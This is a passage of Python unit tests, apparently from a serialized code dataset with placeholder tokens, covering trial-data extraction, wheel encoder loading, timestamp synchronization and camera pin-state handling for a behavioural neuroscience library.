unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()\n ]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()\n ]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def 
test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i 
+ 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n        40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = camera.attribute_times(tsa, tsb)\n        expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n        np.testing.assert_array_equal(matches, expected)\n        self.assertEqual(matches.size, tsb.size)\n        matches = camera.attribute_times(tsa, tsb, take='nearest')\n        expected[np.r_[1:3]] = expected[1:3] + 1\n        np.testing.assert_array_equal(matches, expected)\n        matches = camera.attribute_times(tsa, tsb, take='after')\n        missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n            25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n        expected[missing] = -1\n        np.testing.assert_array_equal(matches, expected)\n        matches = camera.attribute_times(tsa, tsb, tol=0.05)\n        expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n            49, 53, 57])\n        np.testing.assert_array_equal(matches[matches > -1], expected)\n        matches = camera.attribute_times(tsa, tsb, injective=False, take=\n            'nearest')\n        expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n        np.testing.assert_array_equal(matches, expected)\n        with self.assertRaises(ValueError):\n            camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n    def setUp(self):\n        self.main_path = Path(__file__).parent\n        self.training_lt5 = {'path': self.main_path / 'data' /\n            'session_training_lt5'}\n        self.biased_lt5 = {'path': self.main_path / 'data' /\n            'session_biased_lt5'}\n        self.training_ge5 = {'path': self.main_path / 'data' /\n            'session_training_ge5'}\n        self.biased_ge5 = {'path': self.main_path / 'data' /\n            'session_biased_ge5'}\n        self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n            'path']))\n        self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n            )\n        
self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, 
np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def 
test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 
12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 
0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()\n ]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()\n ]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n 
np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 